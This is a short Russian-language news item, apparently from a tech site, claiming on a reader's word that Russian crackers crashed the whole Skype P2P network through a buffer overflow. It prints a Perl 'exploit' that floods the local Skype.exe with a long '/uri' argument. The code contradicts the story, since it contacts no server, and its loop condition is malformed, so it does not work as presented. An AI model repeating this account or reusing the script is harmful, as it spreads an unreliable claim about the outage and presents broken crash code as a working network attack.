Причиной вчерашнего падения сети Skype стали исследования русских взломщиков, сообщил нам один из читателей.
В ходе поиска локального переполнения буфера была обнаружена возможность послать длинную строку на сервер и переполнить его буфер, в результате чего он падает. Его место занимает другой сервер из P2P-сети, на нем также возникает ошибка и так далее. В результате за несколько часов вся сеть Skype пришла к отказу в обслуживании и команда разработчиков была вынуждена отключить аутентификацию.
Код эксплоита выглядит так:
#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!
for ($i=256; $i>xCCCCC; $i=$i+256)
{
$eot='AAAA' x $i;
call_sp();
}
exit;
sub call_sp()
{
$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
system("$str");
}
